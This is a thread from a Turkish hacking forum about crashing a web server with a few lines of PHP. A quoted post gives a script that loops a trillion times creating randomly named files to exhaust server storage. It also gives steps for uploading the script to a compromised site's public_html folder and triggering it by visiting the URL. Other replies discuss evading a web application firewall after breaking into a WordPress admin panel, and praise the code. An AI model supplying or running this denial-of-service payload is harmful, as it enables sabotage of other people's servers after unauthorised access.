4 Satır Kod İle Sunucuyu Çökertin

MuhammedTr768

MuhammedTr768

Kıdemli Üye
7 Kas 2021
2,932
1,815
31
MyKrallife
llslowlI' Alıntı:
Siz ne dediğimi anlamadınız herhalde bende sql wafdan bahsetmiyorum ->Alıntı: Admin panele sızdın diyelim index ve Shell basamıyorsun waf dan dolayı <- Olaya bak bence sizin hacking bilginiz düşük arkadaşın paylaştığı kod php kodu yani admin panelden shell basamadı ve index basamadı diye bu kodumu yükleyecek pardon bu kodu yüklemesi için admin panelin php uzantısı kabul etmesi gerekir php uzantısı kabul ediyorsa dava bitmiştir istediği kadar waf olsun her şekil bypass ederim kendi adıma konuşuyorum siz hacking bilgisi olmayanlar siteye bu kodu yükleyip bırakabilirsiniz diyecek bişi yok.
Genişletmek için tıkla ...
Lan... Wp site girdigini düşün PHP dosya kabul ediyor fakat zararlı kodlar var ise engelliyor. Bu durumda zararlı kod olmayan PHP dosyası enjekte edersin.
 
'Medusa

'Medusa

Katılımcı Üye
18 Ocak 2021
840
370
JAPAN
Eline sağlık bazı sunucuların bu gibi kodlara karşı koruması var fakat onlarda rastgele gelir geliştirilirse belkide bunlara karşı bile gelebilir. Tebrikler!
 
TheNeferian

TheNeferian

Medyanın Yıldızı
27 Kas 2022
1,425
1,129
є.ค♡
Rewan' Alıntı:
Bu kodu siteye enjekte eder çalışır hale getirirseniz sunucu içerisinde toplamda 1.000.000.000.000 Adet dosya oluşturacaktır.

Kullanım ;

sunucuya php dosyanızı upload edin ve web dizininden o satıra gidiniz

örnek ;
sunucuya yüklenen php dosya = public_html/rewan.php
örneksite.com/rewan.php

bu kadar basit :)


UYARI LOCALHOSTA DENEMEYİN ZARAR VEREBİLİR


Kod: 
<?php
 
for ($i=0; $i<1000000000000 ; $i++) {
    $rewan = rand(1,200000000);
    fopen($rewan, "w"); }

#rewan yerine kendi adınızı yazabilirsiniz tüm dosyalar o isimle açılır.
?>
Genişletmek için tıkla ...
Eline sağlık
 
Cevap yazmak için giriş yap yada kayıt ol.
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.